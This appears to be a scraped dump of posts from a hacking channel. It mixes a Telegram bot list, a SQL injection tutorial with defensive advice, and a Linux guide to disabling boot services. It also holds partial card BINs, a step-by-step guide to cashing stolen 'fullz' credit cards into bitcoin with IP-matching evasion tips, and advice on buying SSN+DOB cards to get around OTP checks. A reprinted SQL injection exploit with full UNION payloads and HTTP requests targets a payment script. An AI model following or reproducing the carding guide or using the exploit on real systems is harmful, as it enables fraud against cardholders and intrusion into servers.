UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


πŸ¦‘Ali express bins
t.me/UndercodeTesting


51080501528xxxxx
08/22
Ip - USA

πŸ¦‘Bins : Netflix
545404xxxxxxxxxx
530998xxxxxxxxxx
518695xxxxxxxxxx
IP: BRAZIL

CCLEANER V4.20.3 B800006534 [PRO]

> https://play.google.com/store/apps/details?id=com.piriform.ccleaner>



🦑 BEST TELEGRAM BOTS YOU SHOULD KNOW, RECOMMENDED BY UNDERCODE:

1) BotFather
BotFather is the official Telegram Bot used to create bots and change settings for existing ones.

You'll need BotFather even if you're not going to make your own bots as a bot developer. Some bots for Telegram channel admins will ask you to use BotFather to generate Telegram Bot API tokens. So it's good to get familiar with this procedure before we go any further.

Creating a new Telegram bot is pretty straightforward.

Just open BotFather, send /newbot command, pick a name and a username:


2) ControllerBot
ControllerBot is a feature-rich bot for Telegram channel owners.

It allows you to:

- write rich-text posts with Markdown/HTML markup;
- add reaction buttons (Emoji, text or both);
- add button to open post comments;
- schedule posts;
- add self-destruct timer for temporary posts;
- see channel stats.

Here is an example of how post reactions can be added with ControllerBot:


3) LivegramBot
LivegramBot is a feedback bot constructor.

Here is a self-explanatory example of this bot usage:


Feedback bots like this one can be used for everything: channels, groups, bots and even websites.

4) VoteBot
VoteBot is a bot for creating polls in Telegram. Polls can be shared with friends or published in channels and groups.

Using VoteBot is very simple:


When the poll is created, type @vote in your channel to open the polls list:


5) Giphy GIF Search
Giphy GIF Search is a bot for searching and posting gifs. It can be used with channels as well.

Type @gif with a search query in your channel and gif suggestions will show up:


6) Telegraph
telegra.ph is a minimalistic publishing tool that allows you to create rich-formatted posts with images, videos and other embedded content.

Telegram supports Instant View for posts published with telegra.ph, which lets readers open your posts right in the Telegram app without visiting any other website.

To manage your telegra.ph publications and log in across any number of devices, try the official Telegraph bot.


7) InviteMember
InviteMember is a bot platform for subscription/membership bots.

@UndercodeTesting

πŸ¦‘ Fast CC TO BTC :


> CC TO BTC TRICK


- Buy A Fresh Fullz CC (Visa/Mastercard)From Trusted Vendors Or *ME* (Fullz Have SSN)

- If You Bought Dallas(city),Texas(st) Cc Use Dallas Ip (must use 911 vpn or Rdp)

-After Connecting ip Go to outlook and make an email same as Cc Owner Name

- Then Go to cex.io ( cex.io is the best site to buy btc from credit cards)

- Register A New Account . Use Outlook eMail To Register as New :)

- After Registering, Verify your Email

- Ok Then We Can Add Balance To Cex.io ...... Click On Deposit then it will be redirect to payment gate.

- Now Fill Cc Details & Choose The Amount ( Choose Below 150$ First then succeeded we Can add more)

- Then Fill the Billing Address & SSN (Fullz Cc Will Have Billing Address & SSN)

- Then Click Proceed

- Then Account Will Be Funded with your choosed Amount (unless you use dead card) & After Success Fund More Amount How Much You Can Do With The Credit Card

- Now go to home page and click Buy/Sell

- Buy Bitcoin With Your Deposited Amount (If You deposited 700$ buy btc below 700$)

- Now you'll be turned into 700$ to Btc

- Now Go to Withdraw select Btc Then put your wallet address & select amount then click withdraw

Hurreyyy!!!! Now The Btc Instantly Will transfer to Your wallet.

@UndercodeTesting

🦑 The 2018 PayPal CVE IS NOW PUBLIC FREE
> PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection
t.me/UndercodeTesting

🦑 Tested by Undercode:

# POC:
# 1)
# http://localhost/[PATH]/index.php?p=accomodation&q=[SQL]
#
#[PATH]/accomodation.php
#...
#50 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND ACCOMODATION='" . $_GET['q'] . "' AND NUMPERSON = " . $_POST['person'];
#51
#52
#53 }elseif(isset($_GET['q'])){
#54
#55 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND ACCOMODATION='" . $_GET['q'] . "'";
#56
#57
#58
#59 }
#60
#61 $accomodation = ' | ' . $_GET['q'];
#62 ?>
#...
GET /[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 19:55:17 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC:
# 2)
# http://localhost/[PATH]/index.php?p=rooms&q=[SQL]
#
#[PATH]/room_rates.php
#...
#50 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND NUMPERSON = " . $_POST['person'];
#51
#52
#53 }elseif(isset($_GET['q'])){
#54
#55 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND ROOM LIKE '%" . $_GET['q'] . "%'";
#56
#57
#58 }else{
#59 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID";
#60 }
#61
#62 $accomodation = ' | ' . @$_GET['q'];
#63 ?>
#...
GET /[PATH]/index.php?p=rooms&q=RM%20223%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 19:58:47 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC:
# 3)
# http://localhost/[PATH]/admin/login.php
#
#[PATH]/admin/login.php
#...
#58 if (isset($_POST['btnlogin'])) {
#59 //form has been submitted1
#60
#61 $uname = trim($_POST['email']);
#62 $upass = trim($_POST['pass']);
#...

@UndercodeTesting
🦑 Last PayPal exploit


πŸ¦‘ how to buy a working cc ?
pinterest.com/undercode_Testing

> Are u a hacker then u easily bypass otp or you don't know ss7 attack. Then buy ssn+dob payment base cc. It cc don't require otp on payment. You fill ssn+dob on payment getway. then pay is susses.


πŸ¦‘ Where i buy amazon egift cards??


1) Go on
https://www.mtcgame.com/en-GB

2) Login on your created account.
It payment getaway is easy and 1 more site https://www.mygiftcardsupply.com/shop/amazon-gift-cards/


have easy pay. Getway .


πŸ¦‘ Carding tools

Socks5/rdp ,mac address changer,ccleaner.

πŸ¦‘ How to use securely???


Socks5/rdp.-- You do not use the same zip code for the owner of cc or cc. use rdp/socks5 according to state.

Don't clean cookies in carding time.


Then fill ssn and dob on payment getway..

@UndercodeTesting
🦑 SQL INJECTION FOR BEGINNERS FULL TUTORIAL


1) SQL injection is one of the more common network attack methods. Rather than exploiting a bug in the operating system, it targets negligence on the programmer's part: through crafted SQL statements the attacker can log in without an account or even tamper with the database.


2) A SQL injection attack can occur when an application uses input to construct a dynamic SQL statement to access the database. It can also occur when the code uses stored procedures that are passed strings containing unfiltered user input.

3) SQL injection may allow an attacker to use the application to log in and execute commands in the database. If the application connects to the database with an overprivileged account, this problem can become very serious. In some forms, the content entered by the user is used directly to construct dynamic SQL commands or as input parameters of stored procedures. These forms are particularly vulnerable to SQL injection attacks. Many website programs are written without checking the validity of user input, or handle variables improperly in the program itself, which poses potential security risks to the application.

4) As a result, a user can submit a piece of database query code and, based on the results the program returns, obtain sensitive information or take control of the entire server. That is SQL injection.


🦑 The general idea of SQL injection attacks:

1) Find the location of the SQL injection

2) Determine the server type and the back-end database type

3) Perform the SQL injection attack according to the characteristics of that server and database


🦑 A simple example:

SQL> create table account(id number primary key, name varchar2(10), password varchar2(20));
Table created.

SQL> insert into account values(1, 'bisal', '111111');
1 row created.

SQL> commit;
Commit complete.

SQL> select * from account;
ID NAME PASSWORD
---------- ---------- --------------------
1 bisal 111111

SQL> select * from account where name='' or 1=1 -- and password='';
ID NAME PASSWORD
---------- ---------- --------------------
1 bisal 111111


Once the condition becomes "username = 'xx' or 1 = 1", the user name is compared with an empty string "or 1 = 1". Because 1 = 1 is always true, the condition always succeeds. The two "-" characters added after it start a comment, which comments out the rest of the statement so that it has no effect. The statement therefore always executes correctly, and a user can easily cheat the system and obtain a legitimate identity.



The cause of a SQL injection vulnerability is the splicing of SQL parameters: the query parameters taken from input are spliced directly into the SQL statement. For example,

select id, password from user where id = 2;


If the statement is built by concatenating SQL strings, for example,

String sql = "select password from user where id =" + id;


where id is a parameter entered by the user, then a user who enters "2 or 1 = 1" turns the statement above into (select id, password from user where id = 2 or 1 = 1;) and every record in the user table is returned. This is a typical SQL injection.



Imagine the user entering a dangerous operation such as drop table: an attack through SQL injection is then not just a data leak but can damage the database.

🦑 As for the solution, someone summed it up:

1) Never trust user input. Validate it: you can use regular expressions, limit the length, escape single quotes and double hyphens ("--"), and so on.

2) Never assemble SQL dynamically. Use parameterized SQL (bound variables), or use stored procedures directly for data query and access.

3) Never use a database connection with administrator rights. Use a separate database connection with limited rights for each application.

4) Do not store confidential information directly. Encrypt or hash passwords and sensitive information.

5) The application's exception messages should give as few hints as possible. It is best to wrap the original error message in a custom error message.

6) SQL injection is generally detected with auxiliary software or a website platform.
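
Points 1 and 2 can be seen side by side in the sketch below, which is an added example and not part of the original tutorial. It rebuilds the tutorial's account table in an in-memory SQLite database (SQLite stands in for the Oracle session shown above, the second row is constructed, and all function names are hypothetical) and runs the tutorial's two inputs through a spliced query and a bound query.

```python
import sqlite3

def make_db():
    """In-memory copy of the tutorial's account table (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE account (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    # Plaintext passwords mirror the tutorial's table; point 4 says to hash them.
    db.executemany("INSERT INTO account VALUES (?, ?, ?)",
                   [(1, "bisal", "111111"), (2, "carol", "222222")])
    return db

def login_spliced(db, name, password):
    # Vulnerable: user input becomes part of the SQL text itself.
    sql = ("SELECT id, name FROM account WHERE name='" + name
           + "' AND password='" + password + "'")
    return db.execute(sql).fetchall()

def login_bound(db, name, password):
    # Bound variables: the statement text is fixed, input is passed as data.
    sql = "SELECT id, name FROM account WHERE name=? AND password=?"
    return db.execute(sql, (name, password)).fetchall()

def lookup_spliced(db, user_id):
    # A numeric context is injectable without any quote character.
    return db.execute("SELECT id, name FROM account WHERE id = " + user_id).fetchall()

def lookup_bound(db, user_id):
    # The whole input is compared as one value, so "2 or 1 = 1" matches no id.
    return db.execute("SELECT id, name FROM account WHERE id = ?", (user_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    tautology = "' or 1=1 --"  # the input from the tutorial's example
    print("spliced login :", login_spliced(db, tautology, ""))
    print("bound login   :", login_bound(db, tautology, ""))
    print("real login    :", login_bound(db, "bisal", "111111"))
    print("spliced lookup:", lookup_spliced(db, "2 or 1 = 1"))
    print("bound lookup  :", lookup_bound(db, "2 or 1 = 1"))
```

The spliced functions return every row for both inputs, while the bound versions return nothing for them and still accept the genuine credentials.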
🦑 Learning more about SQL injection for free:


1) Sqli-labs
Sqli-labs is a game tutorial written by an Indian programmer to learn SQL injection. It can be installed locally, accessed by a browser, and learn various SQL injection cases

https://github.com/Audi-1/sqli-labs

2) OWASP

OWASP (Open Web Application Security Project) is an open source organization focused on information security. It hosts various open source projects that you can take part in or use under their conditions. If you are interested, have a look.

http://www.owasp.org.cn/owasp-project
🦑 WE SEND NEW HACKING TIPS EVERY DAY, BUT WHAT DO YOU NEED US TO FOCUS ON?
Final results:
- cracking ? 44%
- carding ? 39%
- scripts ? 6%
- android ios tips ? 11%

🦑 Linux system boot items cleanup, in full, by undercode
t.me/undercodeTesting

🦑 LET'S START:

1) General-purpose Linux distributions usually start a variety of services at boot, including many that you may never need, such as Bluetooth (bluetooth), Avahi, the modem manager (ModemManager) and ppp-dns (a typo by the original author; it should be pppd-dns). What are these things, where are they used, and what do they do?

2) Systemd provides many good tools for inspecting system startup, and it can also control what runs when the system starts. In this article, I will explain how to shut down some annoying processes on systemd-based distributions.

🦑 View boot items
In the past, you could easily see which services would start at boot by looking in /etc/init.d. Systemd presents this differently. You can use the following command to list the services that are enabled to start.

1) $ systemctl list-unit-files --type=service | grep enabled
accounts-daemon.service enabled
anacron-resume.service enabled
anacron.service enabled
bluetooth.service enabled
brltty.service enabled
[...]

2) Near the top of this list, the Bluetooth service is redundant for me: I don't use Bluetooth on this computer, so I don't need to run it. The following commands stop the service and keep it from starting at boot.

3) $ sudo systemctl stop bluetooth.service

4) $ sudo systemctl disable bluetooth.service

🦑 You can use the following command to determine whether the operation was successful.

1) $ systemctl status bluetooth.service
bluetooth.service - Bluetooth service
Loaded: loaded (/lib/systemd/system/bluetooth.service; disabled; vendor preset: enabled)
Active: inactive (dead)
Docs: man:bluetoothd(8)

2) A disabled service can still be started by another service. If you really want it never to start at boot under any circumstances, you don't need to uninstall it; just mask it, which prevents the service from starting under any circumstances.

3) $ sudo systemctl mask bluetooth.service
Created symlink from /etc/systemd/system/bluetooth.service to /dev/null.

4) Once you are satisfied that preventing the service from starting has no negative effects, you can also choose to uninstall the program.

🦑 The following service list can be obtained by executing the command:

1) $ systemctl list-unit-files --type=service
UNIT FILE STATE
accounts-daemon.service enabled
acpid.service disabled
alsa-restore.service static
alsa-utils.service masked

2) You cannot enable or disable static services, because they are dependencies of other processes and are not meant to run on their own.

🦑 Which services can be disabled?

1) How do you know which services you need and which ones can be safely disabled? It always depends on your individual needs.

2) Here is what several of these services do. Many services are distribution-specific, so you should look at your distribution's documentation (for example, via Google or StackOverflow).

3) accounts-daemon.service is a potential security risk. It is part of AccountsService, which allows programs to obtain or manipulate user account information. I don't think there are good reasons for me to allow such background operations, so I chose to mask the service.

4) avahi-daemon.service is used for zero-configuration network discovery, making it easy for computers to discover printers or other hosts on the network. I always disable it and don't miss it.

> brltty.service provides support for Braille devices, such as Braille displays.
> debug-shell.service opens a huge security hole (the service provides a passwordless root shell to help debug systemd problems). Never start this service unless you are actually using it.

> ModemManager.service is a daemon activated by dbus to provide a mobile broadband (2G / 3G / 4G) interface. If you don't have such an interface, whether built in, on a phone paired via Bluetooth, or on a USB adapter, then you do not need the service.

> pppd-dns.service is a relic of computer development. If you use dial-up to access the Internet, keep it; otherwise you do not need it.

> rtkit-daemon.service sounds terrible, like a rootkit. But you need this service because it is a real-time kernel scheduler.

> whoopsie.service is an Ubuntu error reporting service. It is used to collect Ubuntu system crash reports and send them.

> wpa_supplicant.service is only required when you use a Wi-Fi connection.

written by undercode
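
The review described in this post can be scripted. The sketch below is an added example, not part of the original article: it parses `systemctl list-unit-files --type=service` output and reports which enabled units the post comments on, with debug-shell.service ranked first. The sample output is constructed, and the function names and severity labels are assumptions made for the example.

```python
# Notes condensed from the service descriptions in the post above.
NOTES = {
    "debug-shell.service": ("high", "passwordless root shell; never start unless in use"),
    "accounts-daemon.service": ("review", "lets programs read or change user account info"),
    "avahi-daemon.service": ("review", "zero-configuration network discovery"),
    "bluetooth.service": ("review", "only needed if Bluetooth is used"),
    "brltty.service": ("review", "only needed for Braille devices"),
    "ModemManager.service": ("review", "only needed with a mobile broadband interface"),
    "pppd-dns.service": ("review", "only needed for dial-up"),
    "whoopsie.service": ("review", "Ubuntu crash report sender"),
    "wpa_supplicant.service": ("review", "only needed for Wi-Fi"),
    "rtkit-daemon.service": ("keep", "real-time kernel scheduler, despite the name"),
}

# Constructed sample of `systemctl list-unit-files --type=service` output.
SAMPLE = """\
UNIT FILE                  STATE
accounts-daemon.service    enabled
alsa-restore.service       static
alsa-utils.service         masked
bluetooth.service          disabled
debug-shell.service        enabled
rtkit-daemon.service       enabled
ssh.service                enabled

7 unit files listed.
"""

def parse_unit_files(text):
    """Return {unit: state}, skipping the header, blank lines and the footer."""
    units = {}
    for line in text.splitlines():
        fields = line.split()
        # Some systemd versions print a third preset column; ignore it.
        if len(fields) >= 2 and fields[0].endswith(".service"):
            units[fields[0]] = fields[1]
    return units

def review_boot_services(text):
    """List (severity, unit, note) for enabled units the post comments on."""
    order = {"high": 0, "review": 1, "keep": 2}
    findings = []
    for unit, state in parse_unit_files(text).items():
        if state == "enabled" and unit in NOTES:
            severity, note = NOTES[unit]
            findings.append((severity, unit, note))
    return sorted(findings, key=lambda f: (order[f[0]], f[1]))

if __name__ == "__main__":
    for severity, unit, note in review_boot_services(SAMPLE):
        print(f"{severity:<7}{unit:<26}{note}")
```

Static, masked and disabled units are left out of the report, since only enabled units start at boot on their own.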